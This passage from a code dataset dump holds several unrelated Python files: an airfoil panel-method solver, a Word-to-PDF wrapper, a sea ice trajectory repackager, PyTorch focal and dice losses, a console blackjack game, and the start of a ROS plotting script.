Accessed: Mar. 07, 2023. [Online].\n Available: ``_\n\n Parameters\n ==========\n coord: np.ndarray\n An :math:`N \\times 2` array of airfoil coordinates, where :math:`N` is the number of coordinates, and the columns\n represent :math:`x` and :math:`y`\n\n alpha: float or np.float64\n Angle of attack of the airfoil\n\n Returns\n =======\n np.ndarray, np.ndarray, float\n The first returned array is of size :math:`(N-1) \\times 2` and represents the :math:`x` and :math:`y` locations\n of the collocation points, where :math:`N` is the number of airfoil coordinates. 
The second returned array is a\n one-dimensional array with length :math:`(N-1)` representing the surface pressure coefficient at each collocation\n point. The final returned value is the lift coefficient.\n \"\"\"\n\n N = len(coord) # Number of panel end points\n M = N - 1 # Number of control points\n\n EP = zeros((N, 2)) # Clockwise-defined panel end points\n EPT = zeros((N, 2)) # End points from file\n PT1 = zeros((M, 2)) # Start point of panel\n PT2 = zeros((M, 2)) # End point of panel\n CO = zeros((M, 2)) # Collocation point\n A = zeros((N, N)) # Aerodynamic influence coefficient matrix\n B = zeros((N, N)) # Tangential induced velocities (with gammas)\n TH = zeros((M,)) # Panel angle\n DL = zeros((M,)) # Panel length\n RHS = zeros((N, 1)) # Freestream component normal to panel\n V = zeros((M,)) # Panel tangential velocity\n\n ALPHA = alpha # AOA in deg\n AL = ALPHA * pi / 180\n\n EPT[:, 0] = coord[:, 0] # Read in x/c position of panel end points\n EPT[:, 1] = coord[:, 1] # Read in y/c position of panel end points\n\n # Order panel end points defined in clockwise direction\n for i in range(N):\n EP[i, 0] = EPT[N - i - 1, 0]\n EP[i, 1] = EPT[N - i - 1, 1]\n\n # Define end points of each panel (PT1 is beginning point, PT2 is end point)\n for i in range(M):\n PT1[i, 0] = EP[i, 0]\n PT2[i, 0] = EP[i+1, 0]\n PT1[i, 1] = EP[i, 1]\n PT2[i, 1] = EP[i+1, 1]\n\n # Determine local slope of each panel\n for i in range(M):\n DZ = PT2[i, 1] - PT1[i, 1]\n DX = PT2[i, 0] - PT1[i, 0]\n TH[i] = arctan2(DZ, DX)\n\n # Identify collocation points for each panel (half-panel location)\n for i in range(M):\n CO[i, 0] = (PT2[i, 0] - PT1[i, 0]) / 2 + PT1[i, 0]\n CO[i, 1] = (PT2[i, 1] - PT1[i, 1]) / 2 + PT1[i, 1]\n\n # Determine influence coefficients\n for i in range(M):\n for j in range(M):\n\n # Determine location of collocation point i in terms of panel j\n # coordinates\n XT = CO[i, 0] - PT1[j, 0]\n ZT = CO[i, 1] - PT1[j, 1]\n X2T = PT2[j, 0] - PT1[j, 0]\n Z2T = PT2[j, 1] - PT1[j, 1]\n\n X = XT*cos(TH[j]) + ZT*sin(TH[j])\n Z = -XT*sin(TH[j]) + ZT*cos(TH[j])\n X2 = X2T*cos(TH[j]) + Z2T*sin(TH[j])\n Z2 = 0\n\n # Store length of each panel (only required for first loop in i)\n if i == 0:\n DL[j] = X2\n\n # Determine radial distance and angle between corner points of jth\n # panel and ith control point\n R1 = sqrt(X**2 + Z**2)\n R2 = sqrt((X - X2)**2 + Z**2)\n TH1 = arctan2(Z, X)\n TH2 = arctan2(Z, X - X2)\n\n # Determine influence coefficient of jth panel on ith control point\n # (include consideration for self-induced velocities)\n if i == j:\n U1L = -0.5*(X - X2) / X2\n U2L = 0.5*X / X2\n W1L = -0.15916\n W2L = 0.15916\n else:\n U1L = -(Z*log(R2/R1) + X*(TH2 - TH1) - X2*(TH2 - TH1)) / (6.28319*X2)\n U2L = (Z*log(R2/R1) + X*(TH2 - TH1)) / (6.28319*X2)\n W1L = -((X2 - Z*(TH2 - TH1)) - X*log(R1/R2) + X2*log(R1/R2)) / (6.28319*X2)\n W2L = ((X2 - Z*(TH2 - TH1)) - X*log(R1/R2)) / (6.28319*X2)\n\n # Rotate coordinates back from jth panel reference frame to airfoil\n # chord frame\n U1 = U1L * np.cos(-TH[j]) + W1L * np.sin(-TH[j])\n U2 = U2L*cos(-TH[j]) + W2L*sin(-TH[j])\n W1 = -U1L*sin(-TH[j]) + W1L*cos(-TH[j])\n W2 = -U2L*sin(-TH[j]) + W2L*cos(-TH[j])\n\n # Define AIC: A(i,j) is the component of velocity normal to control\n # point i due to panel j\n # B(i,j) is the tangential velocity along control point i due to\n # panel j, used after solving for gammas\n if j == 0:\n A[i, 0] = -U1*sin(TH[i]) + W1*cos(TH[i])\n HOLDA = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, 0] = U1*cos(TH[i]) + W1*sin(TH[i])\n HOLDB = 
U2*cos(TH[i]) + W2*sin(TH[i])\n elif j == M - 1:\n A[i, M - 1] = -U1*sin(TH[i]) + W1*cos(TH[i]) + HOLDA\n A[i, N - 1] = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, M - 1] = U1*cos(TH[i]) + W1*sin(TH[i]) + HOLDB\n B[i, N - 1] = U2*cos(TH[i]) + W2*sin(TH[i])\n else:\n A[i, j] = -U1*sin(TH[i]) + W1*cos(TH[i]) + HOLDA\n HOLDA = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, j] = U1*cos(TH[i]) + W1*sin(TH[i]) + HOLDB\n HOLDB = U2*cos(TH[i]) + W2*sin(TH[i])\n\n # Set up freestream component of boundary condition\n RHS[i, 0] = cos(AL)*sin(TH[i]) - sin(AL)*cos(TH[i])\n\n # Enforce Kutta condition\n RHS[N - 1, 0] = 0\n\n A[N - 1, 0] = 1\n A[N - 1, N - 1] = 1\n\n # Invert A matrix to solve for gammas\n G = dot(inv(A), RHS)\n\n # With known gammas, solve for CL, CPs\n CL = 0.0\n\n for i in range(M):\n VEL = 0.0\n for j in range(N):\n VEL = VEL + (B[i, j] * G[j])[0]\n V[i] = VEL + cos(AL)*cos(TH[i]) + sin(AL)*sin(TH[i])\n CL = CL + ((G[i] + G[i + 1]) * DL[i])[0]\n\n CP = 1 - V**2\n\n return CO, CP, CL\n\n\ndef main():\n # Insert airfoil points here\n coords = pd.read_csv(os.path.join(DATA_DIR, 'naca0012.dat'), skiprows=1, names=['x', 'y'], delim_whitespace=True)\n # print(coord)\n coords = coords.to_numpy()\n single_element_inviscid(coords, 4.0)\n t1 = time.time()\n CO, CP, CL = single_element_inviscid(coords, 4.0)\n t2 = time.time()\n print(f\"calculation time = {t2 - t1:.4e} seconds\")\n\n fig, axs = plt.subplots()\n axs.plot(CO[:, 0], CP)\n axs.set_xlabel(r\"$x/c$\")\n axs.set_ylabel(r\"$C_p$\")\n axs.invert_yaxis()\n print(f\"CL = {CL:.4g}\")\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"mlau154/pymead","sub_path":"pymead/analysis/single_element_inviscid.py","file_name":"single_element_inviscid.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"34424383535","text":"from utils.helper import WordToPDFConverter\r\nimport os\r\n\r\nclass WordToPDFApp:\r\n def __init__(self, input_path, output_path):\r\n self.input_path = input_path\r\n self.output_path = output_path\r\n \r\n def Convert(self):\r\n if __name__== '__main__':\r\n if os.path.exists(self.input_path):\r\n WordToPDFConverter.convert_word_to_pdf(self.input_path, self.output_path)\r\n else:\r\n print(f'Input word document file \"{self.input_path}\" does not exists..')\r\n\r\nif __name__== '__main__':\r\n input_path = r\"D:\\1. Data Science\\10. Projects\\Python Project\\Project\\abc.docx\"\r\n output_path = r\"D:\\1. Data Science\\10. 
Projects\\Python Project\\Project\\output1.pdf\"\r\n\r\n app = WordToPDFApp(input_path, output_path)\r\n\r\n app.Convert()\r\n ","repo_name":"ganeshbgunjal/Python-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8262377114","text":"from invertiblerp import InvertibleRandomProjection\nimport numpy as np\nimport matplotlib.pyplot as plt\nclass RP():\n def run_rp(self, rp_total_tries, number_of_features, X_train, pca_reconstruction_losses, data_set_name):\n total_tries = rp_total_tries\n components_range = range(1, number_of_features + 1)\n reconstruction_losses = []\n standard_devs = []\n for n_components in components_range:\n sub_reconstruction_losses = []\n for n_try in range(total_tries):\n transformer = InvertibleRandomProjection(n_components=n_components)\n X_transformed = transformer.fit_transform(X_train)\n reconstructed = transformer.inverse_transform(X_transformed)\n reconstruction_loss = ((X_train - reconstructed) ** 2).mean()\n sub_reconstruction_losses.append(reconstruction_loss)\n reconstruction_losses.append(np.array(sub_reconstruction_losses).mean())\n standard_devs.append(np.std(np.array(sub_reconstruction_losses)))\n\n\n print('RP standard devs')\n print(standard_devs)\n plt.xlabel(\"Number of Components\")\n plt.ylabel(\"Reconstruction Error\")\n title = \"MNIST\"\n if data_set_name != 'mnist':\n title = 'Wine'\n plt.title(title + \": Randmized Projection vs. PCA in Reconstruction Error\")\n xticks_names = []\n for n in list(components_range):\n xticks_names.append(str(n))\n # plt.xticks(components_range, xticks_names)\n # plt.yticks()\n\n plt.plot(components_range, reconstruction_losses, marker='o', label='Randomized Projection')\n plt.plot(components_range, pca_reconstruction_losses, marker='x', label='PCA')\n plt.legend()\n\n # plt.axvline(x=9, color=\"red\", linestyle=\"--\")\n plt.savefig('plots/' + data_set_name + '_rp_reconstruction_error_over_component.png')\n plt.close()","repo_name":"yilu1021/dr3","sub_path":"rp.py","file_name":"rp.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72656064212","text":"num_pencils = int(input())\r\nnum_markers = int(input())\r\nliters_cleaner = int(input())\r\ndiscount = int(input()) / 100\r\n\r\npencils_price = 5.80 * num_pencils\r\nmarker_price = 7.20 * num_markers\r\ncleaner_price = 1.20 * liters_cleaner\r\nprice_for_all_mat = pencils_price + marker_price + cleaner_price\r\nprice_with_disc = price_for_all_mat - (price_for_all_mat * discount)\r\n\r\nprint(price_with_disc)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MarinTabakov/SoftUniLearning","sub_path":"1st_steps_in_programming/Excercise/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30398518849","text":"#import required modules\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n#create new data frame from CSV for accounts receivable\r\nrecs = pd.read_csv(\"accounts_receivable.csv\")\r\nrecs[\"inv_date\"] = pd.to_datetime(recs[\"inv_date\"])\r\nrecs[\"due_date\"] = pd.to_datetime(recs[\"due_date\"])\r\nrecs[\"paid_date\"] = pd.to_datetime(recs[\"paid_date\"])\r\n\r\n#create a new column for age of the receivable\r\nrecs[\"age\"] = recs[\"paid_date\"] - 
recs[\"inv_date\"] \r\n\r\n#create a new column for late receivables\r\nrecs[\"late\"] = recs[\"paid_date\"] > recs[\"due_date\"]\r\n\r\n#display the data to the user\r\nprint(recs.dtypes)\r\nprint(recs.head())\r\n\r\n#describe statistics for score and age\r\nprint(\" Descriptive statistics for credit score: \")\r\nprint(recs[\"score\"].describe())\r\nprint(\" Descriptive statistics for age: \")\r\nprint(recs[\"age\"].dt.days.describe())\r\n\r\n#import python library matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\n#create a histogram for the age of the receivable when paid (days)\r\nplt.hist(x=recs[\"age\"].dt.days, bins=20)\r\n\r\n#label the age of receivables histogram\r\nplt.xlabel(\"Age\")\r\nplt.ylabel(\"Frequency\")\r\nplt.title(\"Age of Receivables when Paid\")\r\n\r\n#display the age of receivable histogram\r\nprint(plt.show())\r\n\r\n#create a scatterplot with respective labels\r\nplt.scatter(recs[\"age\"].dt.days, recs[\"score\"])\r\nplt.xlabel(\"Age\")\r\nplt.ylabel(\"Frequency\")\r\nplt.title(\"Age of Receivables when Paid\")\r\n\r\n#import the scipy model\r\nfrom scipy.stats import pearsonr\r\nimport scipy\r\nimport statsmodels.api as sm\r\n\r\n#create a correlation and display it\r\nprint(\" Correlation coeifficient and p-value: \")\r\nprint(pearsonr(recs[\"age\"].dt.days, recs[\"score\"]))\r\n\r\n#create two variables for linear regression\r\ny = recs[\"age\"].dt.days\r\nx = recs[\"score\"]\r\n\r\n#add the constant for linear regression\r\nx = sm.add_constant(x)\r\n\r\n#create the linear regression model\r\nmod = sm.OLS(y, x)\r\n\r\n#estimate the fit of the linear regression model\r\nresults = mod.fit()\r\n\r\n#print the results\r\nprint(results.summary())\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"BayleePeters/Exercise-Week-9","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7502153517","text":"\"\"\"Repackages sea ice parcel trajectories\"\"\"\n\nfrom pathlib import Path\n\nimport csv\nimport datetime as dt\n\nimport numpy as np\nimport xarray as xr\n\nfrom affine import Affine\n\n\nGEOTRANSFORM = (-4524683.8, 25067.5, 0.0, 4524683.8, 0.0, 25067.5)\nPROJECTION = \"+proj=laea +lat_0=90 +lon_0=0 +x_0=0 +y_0=0 +a=6371228 +b=6371228 +units=m +no_defs\"\nEPSG = 3408\n\n\nclass Parcel():\n \"\"\"Class to hold parcel trajectory\"\"\"\n\n def __init__(self, data, year, week_start='08-01'):\n row, column, concentration = zip(*zip(*(iter(data),) * 3))\n ntime = len(row)\n time = get_datetime(year, week_start, nweeks=ntime)\n x, y = to_projected_coordinates(column, row)\n self.time = time\n self.row = np.array(row)\n self.column = np.array(column)\n self.x = np.array(x)\n self.y = np.array(y)\n self.concentration = np.array(concentration)\n\n def __str__(self):\n \"\"\"return str representation\"\"\"\n header = ['time', 'row', 'column', 'x', 'y', 'concentration']\n string = []\n string.append('-'*57+'\\n')\n string.append(' '.join(header)+'\\n')\n string.append('-'*57+'\\n')\n zipped = zip(self.time,\n self.row,\n self.column,\n self.x,\n self.y,\n self.concentration)\n for t, r, c, x, y, s in zipped:\n string.append(f'{t.strftime(\"%Y-%m-%d\")} {r:7.3f} {c:7.3f} {x:11.3f} {y:11.3f} {s:5.1f}\\n')\n return ''.join(string)\n\n\ndef to_projected_coordinates(col, row):\n fwd = Affine.from_gdal(*GEOTRANSFORM)\n xs = []\n ys = []\n for c, r in zip(col, row):\n if c < 999.0:\n x, y = fwd * (c, r)\n else:\n x, y = np.nan, np.nan\n 
def to_projected_coordinates(col, row):\n    fwd = Affine.from_gdal(*GEOTRANSFORM)\n    xs = []\n    ys = []\n    for c, r in zip(col, row):\n        if c < 999.0:\n            x, y = fwd * (c, r)\n        else:\n            x, y = np.nan, np.nan\n        xs.append(x)\n        ys.append(y)\n    return xs, ys\n\n\ndef get_datetime(year, week_start, nweeks=52):\n    date_start = dt.datetime.strptime(f'{year}-{week_start}', '%Y-%m-%d')\n    return [date_start + dt.timedelta(weeks=w) for w in range(nweeks)]\n\n\ndef load_parcels(filepath):\n    year = filepath.split('_')[2][:4]\n    with open(filepath, 'r', newline='') as csvfile:\n        csvreader = csv.reader(csvfile, delimiter=',',\n                               quoting=csv.QUOTE_NONNUMERIC)\n        return [Parcel(data, year) for data in csvreader]\n\n\ndef stack_parcels(parcels):\n    \"\"\"Creates 2D (time, trajectory) arrays\"\"\"\n    arr = np.stack([p.row for p in parcels], axis=1)\n    return arr\n\n\ndef to_xarray(parcels):\n    dims = ['time', 'trajectory']\n    ds = xr.Dataset(\n        {\n            'row': (dims, np.stack([p.row for p in parcels], axis=1)),\n            'col': (dims, np.stack([p.column for p in parcels], axis=1)),\n            'x': (dims, np.stack([p.x for p in parcels], axis=1)),\n            'y': (dims, np.stack([p.y for p in parcels], axis=1)),\n            'concentration': (dims, np.stack([p.concentration for p in parcels], axis=1)),\n        },\n        coords={\n            'time': parcels[0].time,\n            'trajectory': np.arange(len(parcels)),\n        })\n    return ds\n\n\n'''with zipfile.ZipFile(\"parcels.xyz.2019w40_2020w40.zip\", \"w\") as archive:\n    ...:     for idx, parcel in enumerate(parcels):\n    ...:         if idx > 10: break\n    ...:         filename = f'parcel{idx:06d}.csv'\n    ...:         parcel.to_csv(filename)\n    ...:         archive.write(filename)\n'''\n","repo_name":"andypbarrett/sea_ice_parcels","sub_path":"repackage_data.py","file_name":"repackage_data.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71887243095","text":"from typing import Any, List, Union\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass BinaryFocalLoss(nn.Module):\n    \"\"\"\n    This is an implementation of Focal Loss with smooth label cross entropy supported\n    which is proposed in 'Focal Loss for Dense Object Detection.\n    (https://arxiv.org/abs/1708.02002)' Focal_Loss= -1*alpha*(1-pt)*log(pt)\n    :param num_class:\n    :param alpha: (tensor) 3D or 4D the scalar factor for this criterion\n    :param gamma: (float,double) gamma > 0 reduces the relative loss for well-classified\n    examples (p>0.5) putting more focus on hard misclassified example\n\n    :param reduction: `none`|`mean`|`sum`\n    :param **kwargs\n    balance_index: (int) balance class index, should be specific when alpha is float\n    \"\"\"\n\n    def __init__(\n        self,\n        alpha: Union[List[float], np.ndarray] = [1.0, 1.0],\n        gamma: int = 2,\n        ignore_index: Any = None,\n        reduction: str = \"mean\",\n    ) -> None:\n        super(BinaryFocalLoss, self).__init__()\n        if alpha is None:\n            alpha = [0.25, 0.75]\n        self.alpha = alpha\n        self.gamma = gamma\n        self.smooth = 1e-6\n        self.ignore_index = ignore_index\n        self.reduction = reduction\n\n        assert self.reduction in [\"none\", \"mean\", \"sum\"]\n\n        if self.alpha is None:\n            self.alpha = torch.ones(2)\n        elif isinstance(self.alpha, (list, np.ndarray)):\n            self.alpha = np.asarray(self.alpha)\n            self.alpha = np.reshape(self.alpha, (2))\n            assert (\n                self.alpha.shape[0] == 2\n            ), \"the `alpha` shape does not match the number of classes\"\n        elif isinstance(self.alpha, (float, int)):\n            self.alpha = np.asarray(\n                [self.alpha, 1.0 - self.alpha], dtype=np.float64\n            ).reshape(2)\n\n        else:\n            raise TypeError(\"{} not supported\".format(type(self.alpha)))\n\n    def forward(self, output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n        prob = torch.sigmoid(output)\n        prob = torch.clamp(prob,
self.smooth, 1.0 - self.smooth)\n\n pos_mask = (target == 1).float()\n neg_mask = (target == 0).float()\n\n pos_loss = (\n -self.alpha[0]\n * torch.pow(torch.sub(1.0, prob), self.gamma)\n * torch.log(prob)\n * pos_mask\n )\n neg_loss = (\n -self.alpha[1]\n * torch.pow(prob, self.gamma)\n * torch.log(torch.sub(1.0, prob))\n * neg_mask\n )\n\n neg_loss = neg_loss.sum()\n pos_loss = pos_loss.sum()\n num_pos = pos_mask.view(pos_mask.size(0), -1).sum()\n num_neg = neg_mask.view(neg_mask.size(0), -1).sum()\n\n if num_pos == 0:\n loss = neg_loss\n else:\n loss = pos_loss / num_pos + neg_loss / num_neg\n return loss\n\n\nclass FocalLoss_Ori(nn.Module):\n \"\"\"\n This is a implementation of Focal Loss with smooth label cross entropy supported\n which is proposed in'Focal Loss for Dense Object Detection.\n (https://arxiv.org/abs/1708.02002)' Focal_Loss= -1*alpha*(1-pt)*log(pt)\n :param num_class:\n :param alpha: (tensor) 3D or 4D the scalar factor for this criterion\n :param gamma: (float,double) gamma > 0 reduces the relative loss for\n well-classified examples (p>0.5) putting more focus on hard misclassified example\n :param smooth: (float,double) smooth value when cross entropy\n :param size_average: (bool, optional) By default, the losses are averaged\n over each loss element in the batch.\n \"\"\"\n\n def __init__(\n self,\n num_class: int,\n alpha: Any = [0.25, 0.75],\n gamma: int = 2,\n balance_index: int = -1,\n size_average: bool = True,\n ) -> None:\n super(FocalLoss_Ori, self).__init__()\n self.num_class = num_class\n self.alpha = alpha\n self.gamma = gamma\n self.size_average = size_average\n self.eps = 1e-6\n\n if isinstance(self.alpha, (list, tuple)):\n assert len(self.alpha) == self.num_class\n self.alpha = torch.Tensor(list(self.alpha))\n elif isinstance(self.alpha, (float, int)):\n assert 0 < self.alpha < 1.0, \"alpha should be in `(0,1)`)\"\n assert balance_index > -1\n alpha = torch.ones((self.num_class))\n alpha *= 1 - self.alpha\n alpha[balance_index] = self.alpha\n self.alpha = alpha\n elif isinstance(self.alpha, torch.Tensor):\n self.alpha = self.alpha\n else:\n raise TypeError(\n \"Not support alpha type, expect `int|float|list|tuple|torch.Tensor`\"\n )\n\n def forward(self, logit: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n\n if logit.dim() > 2:\n # N,C,d1,d2 -> N,C,m (m=d1*d2*...)\n logit = logit.view(logit.size(0), logit.size(1), -1)\n logit = logit.transpose(1, 2).contiguous() # [N,C,d1*d2..] 
-> [N,d1*d2..,C]\n logit = logit.view(-1, logit.size(-1)) # [N,d1*d2..,C]-> [N*d1*d2..,C]\n target = target.view(-1, 1) # [N,d1,d2,...]->[N*d1*d2*...,1]\n\n # -----------legacy way------------\n # idx = target.cpu().long()\n # one_hot_key = torch.FloatTensor(target.size(0), self.num_class).zero_()\n # one_hot_key = one_hot_key.scatter_(1, idx, 1)\n # if one_hot_key.device != logit.device:\n # one_hot_key = one_hot_key.to(logit.device)\n # pt = (one_hot_key * logit).sum(1) + epsilon\n\n # ----------memory saving way--------\n pt = logit.gather(1, target).view(-1) + self.eps # avoid apply\n logpt = pt.log()\n\n alpha = self.alpha.to(logpt.device) # keep the class weights on the same device as logpt\n alpha_class = alpha.gather(0, target.view(-1))\n logpt = alpha_class * logpt\n loss = -1 * torch.pow(torch.sub(1.0, pt), self.gamma) * logpt\n\n if self.size_average:\n loss = loss.mean()\n else:\n loss = loss.sum()\n return loss\n\n\ndef f_score(\n pr: torch.Tensor,\n gt: torch.Tensor,\n beta: int = 1,\n eps: float = 1e-7,\n threshold: Any = None,\n activation: str = \"sigmoid\",\n) -> torch.Tensor:\n \"\"\"\n Args:\n pr (torch.Tensor): A list of predicted elements\n gt (torch.Tensor): A list of elements that are to be predicted\n eps (float): epsilon to avoid zero division\n threshold: threshold for outputs binarization\n Returns:\n float: F-beta score (F1 when beta == 1)\n \"\"\"\n\n # if activation is None or activation == \"none\":\n # activation_fn = lambda x: x\n # elif activation == \"sigmoid\":\n # activation_fn = torch.nn.Sigmoid()\n # elif activation == \"softmax2d\":\n # activation_fn = torch.nn.Softmax2d()\n\n # else:\n # raise NotImplementedError(\"Activation implemented for sigmoid and softmax2d\")\n\n # pr = activation_fn(pr)\n # gt = torch.unsqueeze(gt, dim=1)\n\n if pr.dim() > 2:\n # N,C,d1,d2 -> N,C,m (m=d1*d2*...)\n pr = pr.view(pr.size(0), pr.size(1), -1)\n pr = pr.transpose(1, 2).contiguous() # [N,C,d1*d2..] -> [N,d1*d2..,C]\n pr = pr.view(-1, pr.size(-1)) # [N,d1*d2..,C]-> [N*d1*d2..,C]\n gt = gt.view(-1, 1) # [N,d1,d2,...]->[N*d1*d2*...,1]\n\n if threshold is not None:\n pr = (pr > threshold).float()\n\n tp = torch.sum(gt * pr).to(pr.device)\n fp = (torch.sum(pr) - tp).to(pr.device)\n fn = (torch.sum(gt) - tp).to(pr.device)\n\n score = ((1 + beta ** 2) * tp + eps) / (\n (1 + beta ** 2) * tp + beta ** 2 * fn + fp + eps\n )\n return score\n\n\nclass DiceLoss(nn.Module):\n def __init__(self, beta: float = 0.5, with_bce: Any = None) -> None:\n super(DiceLoss, self).__init__()\n self.beta = beta\n self.with_bce = with_bce\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n if self.with_bce is not None:\n bce = F.binary_cross_entropy_with_logits(input, target)\n smooth = 1e-5\n num = target.size(0)\n input = input.view(num, -1)\n target = target.view(num, -1)\n intersection = input * target\n dice = ((1 + self.beta ** 2) * intersection.sum(1) + smooth) / (\n (self.beta ** 2) * target.sum(1) + input.sum(1) + smooth\n )\n dice = 1 - dice.sum() / num\n\n if self.with_bce is not None:\n dice = dice + self.with_bce * bce\n return dice # + 0.5 * bce\n","repo_name":"IsHYuhi/FujiFilm_Brains_Solution","sub_path":"libs/Loss.py","file_name":"Loss.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23502986301","text":"import random\n\ndef Intro():\n\n Play_BlackJack=input(\"Welcome to the table. You start out with 100 chips and each hand costs 2 chips. 
Try to get your cards to total 21 by asking for a card if you're under. If you go over, it's a bust. Ready to play? \")\n\n if(Play_BlackJack == \"No\" or Play_BlackJack == \"no\" or Play_BlackJack == \"N\" or Play_BlackJack == \"n\"):\n print(\"Sucks\\n\")\n elif (Play_BlackJack == \"Yes\" or Play_BlackJack == \"yes\" or Play_BlackJack == \"Y\" or Play_BlackJack == \"y\" or Play_BlackJack == \"YES\"):\n print(\"Good let's start!\\n\")\n\ndef BlackJack():\n\n j=0\n Coins=100\n print(str(Coins)+\" coins.\")\n\n while j<30:\n\n Bets=0\n Betm=0\n if (Coins>1): #While the user has coins they can play\n Computer_CardH=random.randint(1,10)\n Computer_CardS=random.randint(1,10)\n User_Cards1=random.randint(1,10)\n User_Cards2=random.randint(1,10)\n UCards=[User_Cards1, User_Cards2] #displays cards\n CCards=[Computer_CardH, Computer_CardS]\n Coins-=2\n print()\n User_Move=input(\"These are your cards \"+str(User_Cards1)+ \" \" + str(User_Cards2)+\" \\nDo you want to hit? You have \"+str(Coins)+ \" coins. Each hit costs 5 chips(y/n)\")\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n \n i=0\n TwentyOneU=0\n TwentyOneC=0\n TwentyO=0\n TwentyOO=0\n TwentyO=User_Cards1+User_Cards2\n TwentyOneU=TwentyO\n\n if(Coins>4 and User_Move!=\"n\"):\n i=0\n Coins-=5\n Bets+=1\n\n while i<9:\n Hit=random.randint(1,10)\n UCards.append(Hit)\n print(\"\\n\"+str(UCards))\n TwentyOneU+=Hit\n\n if (TwentyOneU>21):\n print(\"Bust\")\n i+=10 \n\n elif(Coins>=0):\n print(str(Coins)+\" coins\")\n h=input(\"\\nHit? (y/n)\")\n if (h==\"n\"):\n i+=10\n elif(Coins>4 and h!=\"n\"): #pays coins & makes bet\n Coins-=5\n Bets+=1\n i+=1\n elif (Coins<5 and h!=\"n\"): #cant hit without sufficient coins\n i+=10\n\n if(User_Move==\"n\" or i>5 or Coins<5):\n print()\n print(\"Computer cards are \"+str(Computer_CardH)+\" \"+str(Computer_CardS))\n TwentyOO=Computer_CardH+Computer_CardS\n TwentyOneC=TwentyOO\n\n if(TwentyOneU==TwentyOneC and 17<TwentyOneU<22):\n pass #push; settled when the totals are compared below\n elif(TwentyOneU>TwentyOneC and TwentyOneU<22): \n i=0\n Bets+=1\n\n while i<9:\n Hit=random.randint(1,10)\n CCards.append(Hit)\n print(CCards)\n TwentyOneC+=Hit\n\n if(TwentyOneC>21):\n print(\"Bust\")\n i+=10\n elif(TwentyOneU==TwentyOneC and 17<TwentyOneC<22):\n i+=10\n elif(TwentyOneC>TwentyOneU):\n i+=10\n\n elif(TwentyOneU>=TwentyOneC and TwentyOneU<22):\n Bets+=1\n i+=1\n\n elif(17<TwentyOneC<22):\n i+=10\n elif(TwentyOneC>21 or TwentyOneC>TwentyOneU):\n i+=10\n if(TwentyOneU==TwentyOneC and 17<TwentyOneU<22 or i>5):\n print(\"\\nYou had \"+str(UCards)+\" \"+str(TwentyOneU)+\" Computer had \"+ str(CCards)+\" \"+str(TwentyOneC))\n if((TwentyOneU>TwentyOneC and TwentyOneU<22) or (TwentyOneC>21 and TwentyOneU<22) ):\n Betm+=(5*Bets)\n print(\"You win \"+str(Betm)+\" coins\")\n Coins+=Betm\n print(\"You have \"+str(Coins)+\" coins.\") \n if(Coins!=0):\n A=input(\"Again (y/n)?\")\n if (A==\"n\"):\n print(\"Bye!\")\n break\n else:\n j+=1\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n\n elif((TwentyOneC>TwentyOneU and TwentyOneC<22) or (TwentyOneU>21 and TwentyOneC<22)):\n print(\"You lose\")\n print(\"You have \"+str(Coins)+\" coins.\") \n if(Coins!=0):\n A=input(\"Again (y/n)?\")\n if (A==\"n\"):\n print(\"Bye!\")\n break\n else:\n j+=1\n else:\n print(\"Sorry\")\n print(\"Game Over\")\n R=input(\"Play again and start fresh with 100 coins?\")\n if (R!=(\"n\")):\n BlackJack()\n else:\n break\n \n else:\n print(\"Tie. 
You have \" + str(Coins)+ \" coins\")\n j+=1\n \ndef main():\n Intro()\n BlackJack()\n\nif __name__ == '__main__':\n\n main()","repo_name":"aatrey56/blackjack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31923764917","text":"import matplotlib.pyplot as plt\nimport argparse\nimport rospy\nimport numpy as np\nfrom pathlib import Path\n\ndef main():\n \"\"\"RSDK Joint Position Example: File Playback\n Uses Joint Position Control mode to play back a series of\n recorded joint and gripper positions.\n Run the joint_recorder.py example first to create a recording\n file for use with this example. This example uses position\n control to replay the recorded positions in sequence.\n Note: This version of the playback example simply drives the\n joints towards the next position at each time stamp. Because\n it uses Position Control it will not attempt to adjust the\n movement speed to hit set points \"on time\".\n \"\"\"\n epilog = \"\"\"\nRelated examples:\n record_trajectories.py; plot_trajectories_multi.py.\n \"\"\"\n arg_fmt = 